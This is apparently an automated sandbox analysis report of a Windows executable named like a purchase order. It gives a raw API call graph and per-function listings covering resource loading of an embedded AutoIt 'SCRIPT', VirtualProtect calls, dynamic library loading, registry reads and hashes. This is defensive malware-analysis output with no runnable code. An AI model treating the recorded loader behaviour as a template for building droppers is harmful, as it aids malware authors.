14caf GetProcAddress 36178->36179 36179->36177 36181 17894 36180->36181 36182 17e8c 59 API calls 36181->36182 36183 178a4 36182->36183 36183->36166 36184 13a58 GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 36185 13ac2 LoadImageW RegisterClassExW 36184->36185 36186 4d3cc 36184->36186 36191 13041 GetSysColorBrush RegisterClassExW 
RegisterClipboardFormatW 36185->36191 36195 148fe LoadImageW EnumResourceNamesW 36186->36195 36190 4d3d5 36192 130d2 LoadIconW 36191->36192 36194 13107 36192->36194 36195->36190 36196 19aac0 36197 19aad0 36196->36197 36198 19abea LoadLibraryA 36197->36198 36201 19ac2f VirtualProtect VirtualProtect 36197->36201 36199 19ac01 36198->36199 36199->36197 36203 19ac13 GetProcAddress 36199->36203 36202 19ac94 36201->36202 36202->36202 36203->36199 36204 19ac29 ExitProcess 36203->36204 36205 14f5d 36206 14f68 LoadLibraryExW 36205->36206 36207 4dc3f 36205->36207 36225 14cc8 36206->36225 36208 14faa 66 API calls 36207->36208 36210 4dc46 36208->36210 36212 14cc8 3 API calls 36210->36212 36214 4dc4e 36212->36214 36251 1506b 74 API calls __fread_nolock 36214->36251 36215 14f8f 36215->36214 36216 14f9b 36215->36216 36217 14faa 66 API calls 36216->36217 36219 14fa0 36217->36219 36220 4dc65 36252 791b2 GetSystemTimeAsFileTime 36220->36252 36222 4dc75 36253 15027 69 API calls 36222->36253 36224 4dc82 36254 14d94 36225->36254 36228 14ced 36229 14d08 36228->36229 36230 14cff FreeLibrary 36228->36230 36232 14dd0 36229->36232 36230->36229 36231 14d94 2 API calls 36231->36228 36233 30f36 59 API calls 36232->36233 36234 14de5 36233->36234 36235 1538e 59 API calls 36234->36235 36236 14df1 _memmove 36235->36236 36237 14e2c 36236->36237 36238 14f21 36236->36238 36239 14ee9 36236->36239 36264 15027 69 API calls 36237->36264 36267 799c4 79 API calls 36238->36267 36258 14fe9 CreateStreamOnHGlobal 36239->36258 36244 14e35 36245 14ec9 36244->36245 36247 4dc00 36244->36247 36265 1506b 74 API calls __fread_nolock 36244->36265 36266 15045 69 API calls _fseek 36244->36266 36245->36215 36268 15045 69 API calls _fseek 36247->36268 36249 4dc14 36269 1506b 74 API calls __fread_nolock 36249->36269 36251->36220 36252->36222 36253->36224 36255 14ce1 36254->36255 36256 14d9d LoadLibraryA 36254->36256 36255->36228 36255->36231 36256->36255 36257 14dae GetProcAddress 36256->36257 36257->36255 36259 15020 
36258->36259 36260 15003 FindResourceExW 36258->36260 36259->36237 36260->36259 36261 4dc8c LoadResource 36260->36261 36261->36259 36262 4dca1 SizeofResource 36261->36262 36262->36259 36263 4dcb5 LockResource 36262->36263 36263->36259 36264->36244 36265->36244 36266->36244 36267->36237 36268->36249 36269->36245 36270 136e5 36271 136ca NtdllDefWindowProc_W 36270->36271 36272 136d8 36271->36272 36273 139e7 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 36274 11066 36279 1f8cf 36274->36279 36276 1106c 36277 32ec0 __cinit 67 API calls 36276->36277 36278 11076 36277->36278 36280 1f8f0 36279->36280 36312 30083 36280->36312 36284 1f937 36285 177c7 59 API calls 36284->36285 36286 1f941 36285->36286 36287 177c7 59 API calls 36286->36287 36288 1f94b 36287->36288 36289 177c7 59 API calls 36288->36289 36290 1f955 36289->36290 36291 177c7 59 API calls 36290->36291 36292 1f993 36291->36292 36293 177c7 59 API calls 36292->36293 36294 1fa5e 36293->36294 36322 260e7 36294->36322 36298 1fa90 36299 177c7 59 API calls 36298->36299 36300 1fa9a 36299->36300 36350 2ff1e 36300->36350 36302 1fae1 36303 1faf1 GetStdHandle 36302->36303 36304 54904 36303->36304 36305 1fb3d 36303->36305 36304->36305 36307 5490d 36304->36307 36306 1fb45 OleInitialize 36305->36306 36306->36276 36357 76be1 64 API calls 36307->36357 36309 54914 36358 772b0 CreateThread 36309->36358 36311 54920 CloseHandle 36311->36306 36359 3015c 36312->36359 36315 3015c 59 API calls 36316 300c5 36315->36316 36317 177c7 59 API calls 36316->36317 36318 300d1 36317->36318 36319 17d2c 59 API calls 36318->36319 36320 1f8f6 36319->36320 36321 302e2 6 API calls 36320->36321 36321->36284 36323 177c7 59 API calls 36322->36323 36324 260f7 36323->36324 36325 177c7 59 API calls 36324->36325 36326 260ff 36325->36326 36366 25bfd 36326->36366 36329 25bfd 59 API calls 36330 2610f 36329->36330 36331 177c7 59 API calls 36330->36331 36332 2611a 36331->36332 36333 30f36 59 API calls 36332->36333 36334 1fa68 36333->36334 36335 26259 
36334->36335 36336 26267 36335->36336 36337 177c7 59 API calls 36336->36337 36338 26272 36337->36338 36339 177c7 59 API calls 36338->36339 36340 2627d 36339->36340 36341 177c7 59 API calls 36340->36341 36342 26288 36341->36342 36343 177c7 59 API calls 36342->36343 36344 26293 36343->36344 36345 25bfd 59 API calls 36344->36345 36346 2629e 36345->36346 36347 30f36 59 API calls 36346->36347 36348 262a5 RegisterClipboardFormatW 36347->36348 36348->36298 36351 65ac5 36350->36351 36352 2ff2e 36350->36352 36369 79b90 60 API calls 36351->36369 36353 30f36 59 API calls 36352->36353 36355 2ff36 36353->36355 36355->36302 36356 65ad0 36357->36309 36358->36311 36360 177c7 59 API calls 36359->36360 36361 30167 36360->36361 36362 177c7 59 API calls 36361->36362 36363 3016f 36362->36363 36364 177c7 59 API calls 36363->36364 36365 300bb 36364->36365 36365->36315 36367 177c7 59 API calls 36366->36367 36368 25c05 36367->36368 36368->36329 36369->36356 36370 34a2f 36373 34a4d RtlLeaveCriticalSection RtlLeaveCriticalSection _fseek 36370->36373 36372 34a0f __getstream 36373->36372 36374 77428 36375 77433 36374->36375 36376 30f36 59 API calls 36375->36376 36377 7744a 36376->36377 36378 77459 36377->36378 36379 17f41 59 API calls 36377->36379 36379->36378 36380 4822b 36381 4826c GetLastError 36380->36381 36382 4823b 36380->36382 36402 38c87 58 API calls 3 library calls 36381->36402 36382->36381 36396 47e7d 36382->36396 36385 48291 36403 38ca8 58 API calls __getptd_noexit 36385->36403 36387 4829e GetFileType 36390 482a9 GetLastError 36387->36390 36389 48297 36404 38c87 58 API calls 3 library calls 36390->36404 36392 482d0 CloseHandle 36392->36385 36393 482de 36392->36393 36405 38ca8 58 API calls __getptd_noexit 36393->36405 36395 482e3 36395->36385 36397 47e88 ___crtIsPackagedApp 36396->36397 36398 47ee3 CreateFileW 36397->36398 36399 47e8c GetModuleHandleW GetProcAddress 36397->36399 36401 47f01 36398->36401 36400 47ea9 36399->36400 36400->36401 36401->36381 36401->36387 36402->36385 
36403->36389 36404->36392 36405->36395 36406 20e73 timeGetTime 36408 20e8e 36406->36408 36407 551f3 36407->36407 36408->36407 36409 210ae timeGetTime 36408->36409 36413 20c30 36408->36413 36425 19fbd 60 API calls 36409->36425 36411 210c6 36426 1b89c 61 API calls 36411->36426 36414 30f36 59 API calls 36413->36414 36417 20ccd 36413->36417 36419 20e00 36413->36419 36415 20cb7 36414->36415 36416 30f36 59 API calls 36415->36416 36416->36417 36420 1e580 36417->36420 36421 1e59d 36420->36421 36423 1e5b1 36420->36423 36427 1e060 75 API calls _memmove 36421->36427 36424 1e5a8 36424->36419 36425->36411 36426->36413 36427->36424 36428 407b7 36433 407bc 36428->36433 36430 407c6 36441 38f36 9 API calls __cftof_l 36430->36441 36432 407d1 36439 407c1 36433->36439 36442 3394b 60 API calls 2 library calls 36433->36442 36435 40975 36435->36439 36443 3394b 60 API calls 2 library calls 36435->36443 36437 40994 36437->36439 36444 3394b 60 API calls 2 library calls 36437->36444 36439->36432 36440 38ca8 58 API calls __getptd_noexit 36439->36440 36440->36430 36441->36432 36442->36435 36443->36437 36444->36439 36445 16f36 36446 16f38 36445->36446 36447 30f36 59 API calls 36446->36447 36448 16f91 36447->36448 36449 1700d 36448->36449 36451 174bd 36448->36451 36452 174d0 36451->36452 36455 1757e 36451->36455 36453 30f36 59 API calls 36452->36453 36456 17502 36452->36456 36453->36456 36454 30f36 59 API calls 36454->36456 36455->36448 36456->36454 36456->36455 36457 11078 36462 171eb 36457->36462 36459 1108c 36460 32ec0 __cinit 67 API calls 36459->36460 36461 11096 36460->36461 36463 171fb __ftell_nolock 36462->36463 36464 177c7 59 API calls 36463->36464 36465 172b1 36464->36465 36493 14864 36465->36493 36467 172ba 36500 3068b 36467->36500 36474 177c7 59 API calls 36475 172eb 36474->36475 36476 17eec 59 API calls 36475->36476 36477 172f4 RegOpenKeyExW 36476->36477 36478 17316 36477->36478 36479 4ec0a RegQueryValueExW 36477->36479 36478->36459 36480 4ec27 36479->36480 36481 4ec9c RegCloseKey 
36479->36481 36482 30f36 59 API calls 36480->36482 36481->36478 36492 4ecae _wcscat __wsetenvp 36481->36492 36483 4ec40 36482->36483 36485 1538e 59 API calls 36483->36485 36484 17b52 59 API calls 36484->36492 36486 4ec4b RegQueryValueExW 36485->36486 36487 4ec68 36486->36487 36489 4ec82 36486->36489 36488 17d2c 59 API calls 36487->36488 36488->36489 36489->36481 36490 17f41 59 API calls 36490->36492 36491 13f84 59 API calls 36491->36492 36492->36478 36492->36484 36492->36490 36492->36491 36494 41ac0 __ftell_nolock 36493->36494 36495 14871 GetModuleFileNameW 36494->36495 36496 17f41 59 API calls 36495->36496 36497 14897 36496->36497 36519 148ae 36497->36519 36499 148a1 36499->36467 36501 41ac0 __ftell_nolock 36500->36501 36502 30698 GetFullPathNameW 36501->36502 36503 306ba 36502->36503 36504 17d2c 59 API calls 36503->36504 36505 172c5 36504->36505 36506 17e0b 36505->36506 36507 4f0a3 36506->36507 36508 17e1f 36506->36508 36534 18189 59 API calls 36507->36534 36529 17db0 36508->36529 36511 172d3 36513 13f84 36511->36513 36512 4f0ae __wsetenvp _memmove 36514 13f92 36513->36514 36518 13fb4 _memmove 36513->36518 36516 30f36 59 API calls 36514->36516 36515 30f36 59 API calls 36517 13fc8 36515->36517 36516->36518 36517->36474 36518->36515 36520 41ac0 __ftell_nolock 36519->36520 36521 148bb GetFullPathNameW 36520->36521 36522 148f7 36521->36522 36523 148da 36521->36523 36524 17eec 59 API calls 36522->36524 36525 17d2c 59 API calls 36523->36525 36526 148e6 36524->36526 36525->36526 36527 17886 59 API calls 36526->36527 36528 148f2 36527->36528 36528->36499 36530 17dbf __wsetenvp 36529->36530 36532 17dd0 _memmove 36530->36532 36535 18189 59 API calls 36530->36535 36532->36511 36533 4f060 _memmove 36534->36512 36535->36533 36536 78e3a 36537 78e5f 36536->36537 36539 78e48 __tzset_nolock _memmove 36536->36539 36540 35752 36537->36540 36543 3576d 36540->36543 36542 35768 36542->36539 36544 35779 __getstream 36543->36544 36545 3578f _memset 36544->36545 36546 357bc 36544->36546 
36547 357b4 __getstream 36544->36547 36570 38ca8 58 API calls __getptd_noexit 36545->36570 36548 36d8e __lock_file 59 API calls 36546->36548 36547->36542 36549 357c2 36548->36549 36556 3558d 36549->36556 36552 357a9 36571 38f36 9 API calls __cftof_l 36552->36571 36560 355a8 _memset 36556->36560 36563 355c3 36556->36563 36557 355b3 36661 38ca8 58 API calls __getptd_noexit 36557->36661 36559 355b8 36662 38f36 9 API calls __cftof_l 36559->36662 36560->36557 36560->36563 36567 35603 36560->36567 36572 357f6 RtlLeaveCriticalSection RtlLeaveCriticalSection _fseek 36563->36572 36564 35714 _memset 36664 38ca8 58 API calls __getptd_noexit 36564->36664 36565 34856 __ftell_nolock 58 API calls 36565->36567 36567->36563 36567->36564 36567->36565 36573 40fdb 36567->36573 36641 40d27 36567->36641 36663 40e48 58 API calls 3 library calls 36567->36663 36570->36552 36571->36547 36572->36547 36574 41013 36573->36574 36575 40ffc 36573->36575 36576 4174b 36574->36576 36580 4104d 36574->36580 36674 38c74 58 API calls __getptd_noexit 36575->36674 36690 38c74 58 API calls __getptd_noexit 36576->36690 36579 41001 36675 38ca8 58 API calls __getptd_noexit 36579->36675 36583 41055 36580->36583 36590 4106c 36580->36590 36581 41750 36691 38ca8 58 API calls __getptd_noexit 36581->36691 36676 38c74 58 API calls __getptd_noexit 36583->36676 36586 41061 36692 38f36 9 API calls __cftof_l 36586->36692 36587 4105a 36677 38ca8 58 API calls __getptd_noexit 36587->36677 36589 41081 36678 38c74 58 API calls __getptd_noexit 36589->36678 36590->36589 36591 4109b 36590->36591 36594 410b9 36590->36594 36621 41008 36590->36621 36591->36589 36596 410a6 36591->36596 36679 3899d 58 API calls 2 library calls 36594->36679 36665 45deb 36596->36665 36597 410c9 36599 410d1 36597->36599 36600 410ec 36597->36600 36680 38ca8 58 API calls __getptd_noexit 36599->36680 36682 41a41 60 API calls 3 library calls 36600->36682 36601 411ba 36604 41233 ReadFile 36601->36604 36605 411d0 GetConsoleMode 36601->36605 36607 41255 

                                                Control-flow Graph

                                                APIs
                                                • GetVersionExW.KERNEL32(?,?,00000000), ref: 00014B2B
                                                  • Part of subcall function 00017D2C: _memmove.LIBCMT ref: 00017D66
                                                • GetCurrentProcess.KERNEL32(?,0009FAEC,00000000,00000000,?,?,00000000), ref: 00014BF8
                                                • IsWow64Process.KERNEL32(00000000,?,00000000), ref: 00014BFF
                                                • GetNativeSystemInfo.KERNELBASE(00000000,?,00000000), ref: 00014C45
                                                • FreeLibrary.KERNEL32(00000000,?,00000000), ref: 00014C50
                                                • GetSystemInfo.KERNEL32(00000000,?,00000000), ref: 00014C81
                                                • GetSystemInfo.KERNEL32(00000000,?,00000000), ref: 00014C8D
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                                • String ID:
                                                • API String ID: 1986165174-0
                                                • Opcode ID: 0fdc2b3eac6586e85c2cea375d1f755ea521834ac8a9892e3863eee319ee639c
                                                • Instruction ID: e4c906bff903669c25f83e0076a585dba28c96738f03a60d667f0af1500bf89e
                                                • Opcode Fuzzy Hash: 0fdc2b3eac6586e85c2cea375d1f755ea521834ac8a9892e3863eee319ee639c
                                                • Instruction Fuzzy Hash: 9491C57154E7C0DEC771CB6894911EAFFE4AF2A300B4849AED0CB83A51D324E988D75E

                                                Control-flow Graph

                                                APIs
                                                • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00014FF9
                                                • FindResourceExW.KERNEL32(00000000,0000000A,SCRIPT,00000000,?,?,?,?,?,00014EEE,?,?,00000000), ref: 00015010
                                                • LoadResource.KERNEL32(00000000,00000000,?,?,?,?,?,00014EEE,?,?,00000000), ref: 0004DC90
                                                • SizeofResource.KERNEL32(00000000,00000000,?,?,?,?,?,00014EEE,?,?,00000000), ref: 0004DCA5
                                                • LockResource.KERNEL32(00014EEE,?,?,?,?,?,00014EEE,?,?,00000000), ref: 0004DCB8
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                • String ID: SCRIPT
                                                • API String ID: 3051347437-3967369404
                                                • Opcode ID: 00c9a33ccbf2638a9a7bb633b01167b34ad84717270bbd92656f81e249cf6526
                                                • Instruction ID: 3bf6f0e41a7fc81239e47e157a59030e6c0ff2449cbd62fb4c20b79a1830947a
                                                • Opcode Fuzzy Hash: 00c9a33ccbf2638a9a7bb633b01167b34ad84717270bbd92656f81e249cf6526
                                                • Instruction Fuzzy Hash: 06115A75200702AFE7218B65DC48F677BBAFBC9B52F204169F406CA260DBA1E8408660

                                                Control-flow Graph

                                                APIs
                                                • LoadLibraryA.KERNEL32(?), ref: 0019ABFA
                                                • GetProcAddress.KERNEL32(?,00193FF9), ref: 0019AC18
                                                • ExitProcess.KERNEL32(?,00193FF9), ref: 0019AC29
                                                • VirtualProtect.KERNELBASE(00010000,00001000,00000004,?,00000000), ref: 0019AC77
                                                • VirtualProtect.KERNELBASE(00010000,00001000), ref: 0019AC8C
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: ProtectVirtual$AddressExitLibraryLoadProcProcess
                                                • String ID:
                                                • API String ID: 1996367037-0
                                                • Opcode ID: 55d2f4e630b2a0dabe0a8b6f3919340dba32371807218a8ecbe655fc68f1cc2f
                                                • Instruction ID: da9e6826455c363bc67de88aeb964f8753a1bd40a66cc6ea99d5446ed93a4555
                                                • Opcode Fuzzy Hash: 55d2f4e630b2a0dabe0a8b6f3919340dba32371807218a8ecbe655fc68f1cc2f
                                                • Instruction Fuzzy Hash: 38511472A542124BDF258EB8DCD0660B795EF113247A90738C6E2CB3C5E7A4680DC3E2

                                                Control-flow Graph

                                                APIs
                                                • NtdllDefWindowProc_W.NTDLL(?,?,?,?), ref: 000136D2
                                                • PostQuitMessage.USER32(00000000), ref: 0001375F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: MessageNtdllPostProc_QuitWindow
                                                • String ID: ;=$d
                                                • API String ID: 4264772764-1391878868
                                                • Opcode ID: 1856282f9495b1d806154c0c0b2d016da4ff80be3c8b42d017bfd0e58ad639ab
                                                • Instruction ID: df3634065a15d72fd00cf07b1cc0a01b2a78a8a17e77d029e7b02ecbbf5d1005
                                                • Opcode Fuzzy Hash: 1856282f9495b1d806154c0c0b2d016da4ff80be3c8b42d017bfd0e58ad639ab
                                                • Instruction Fuzzy Hash: A40149F210854ABBEB745F68ED0DAFE3B55FB14301F14403BFA05901A2CE69CAA16732
                                                APIs
                                                • GetFileAttributesW.KERNELBASE(?,0004E6F1), ref: 000744AB
                                                • FindFirstFileW.KERNELBASE(?,?), ref: 000744BC
                                                • FindClose.KERNEL32(00000000), ref: 000744CC
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: FileFind$AttributesCloseFirst
                                                • String ID:
                                                • API String ID: 48322524-0
                                                • Opcode ID: f062f430c51899d4290935f5b344cba8f19b27edbf1e5d63ef59bab9e1e33d18
                                                • Instruction ID: 5a1407149648a329e9789b29cc76420e57a7be1e6ccf8f9a829b6087e1f60b28
                                                • Opcode Fuzzy Hash: f062f430c51899d4290935f5b344cba8f19b27edbf1e5d63ef59bab9e1e33d18
                                                • Instruction Fuzzy Hash: 25E0D831C10801675210A738EC4D5F9779CBF05335F108716F939C10D0EB7C59109599
                                                APIs
                                                • NtdllDefWindowProc_W.NTDLL(?,?,?,?), ref: 000136D2
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: NtdllProc_Window
                                                • String ID:
                                                • API String ID: 4255912815-0
                                                • Opcode ID: 42c82d6c6caea6e003622d23f551cf240159796b25ca4611f8393300b2d25157
                                                • Instruction ID: 99a790eb1d56899517f8f7837308ee8438b84f6c81cb24fd4e2532088009d763
                                                • Opcode Fuzzy Hash: 42c82d6c6caea6e003622d23f551cf240159796b25ca4611f8393300b2d25157
                                                • Instruction Fuzzy Hash: 26C04C33205159A79B219E85BC04DEFBB25FB89322B10456BFA45C016147264531A7B2

                                                Control-flow Graph

                                                APIs
                                                  • Part of subcall function 00014864: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,000172BA,?,?,?,?,0001108C,-000D4E84), ref: 00014882
                                                  • Part of subcall function 0003068B: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,000172C5,?,?,?,?,0001108C,-000D4E84), ref: 000306AD
                                                • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\,?,?,?,?,0001108C,-000D4E84), ref: 00017308
                                                • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?,?,?,?,?,0001108C,-000D4E84), ref: 0004EC21
                                                • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000,?,?,?,?,0001108C,-000D4E84), ref: 0004EC62
                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,0001108C,-000D4E84), ref: 0004ECA0
                                                • _wcscat.LIBCMT ref: 0004ECF9
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                                • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                • API String ID: 2673923337-2727554177
                                                • Opcode ID: f1fae4ca735721230f6eb883dc7a6f269862f0ff9a5cfec9b9b6e81541a39bd2
                                                • Instruction ID: 6bf09debcecb380ee6077dc6a4f7348bb36ff5c97ea5736b7df9869d05f7170f
                                                • Opcode Fuzzy Hash: f1fae4ca735721230f6eb883dc7a6f269862f0ff9a5cfec9b9b6e81541a39bd2
                                                • Instruction Fuzzy Hash: 2A716C7150A3019ED714DF65DC818EBBBF8FF88340F40492EF845871A2DB769949CBA6

                                                Control-flow Graph

                                                APIs
                                                • GetSysColorBrush.USER32(0000000F), ref: 00013A62
                                                • LoadCursorW.USER32(00000000,00007F00), ref: 00013A71
                                                • LoadIconW.USER32(00000063), ref: 00013A88
                                                • LoadIconW.USER32(000000A4), ref: 00013A9A
                                                • LoadIconW.USER32(000000A2), ref: 00013AAC
                                                • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00013AD2
                                                • RegisterClassExW.USER32(?), ref: 00013B28
                                                  • Part of subcall function 00013041: GetSysColorBrush.USER32(0000000F), ref: 00013074
                                                  • Part of subcall function 00013041: RegisterClassExW.USER32(00000030), ref: 0001309E
                                                  • Part of subcall function 00013041: RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 000130AF
                                                  • Part of subcall function 00013041: LoadIconW.USER32(000000A9), ref: 000130F2
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: Load$Icon$Register$BrushClassColor$ClipboardCursorFormatImage
                                                • String ID: #$0$AutoIt v3
                                                • API String ID: 2880975755-4155596026
                                                • Opcode ID: 3bb3f8c39edf680892ea69bbe66327a181628c762d274d7ab17a22db73acaaa0
                                                • Instruction ID: 67d7ea734f446b8b36ccb5a38f8f890cd26236f87c5550208c35d1bcf328fee8
                                                • Opcode Fuzzy Hash: 3bb3f8c39edf680892ea69bbe66327a181628c762d274d7ab17a22db73acaaa0
                                                • Instruction Fuzzy Hash: 41213971902305AFFB10DFA4EC09BBD7BB4FB09712F10012BED04A62A1D3B946589FA4

                                                Control-flow Graph

                                                APIs
                                                • __wcsnicmp.LIBCMT ref: 00040970
                                                • __wcsnicmp.LIBCMT ref: 0004098F
                                                  • Part of subcall function 00038CA8: __getptd_noexit.LIBCMT ref: 00038CA8
                                                Strings
                                                Memory Dump Source
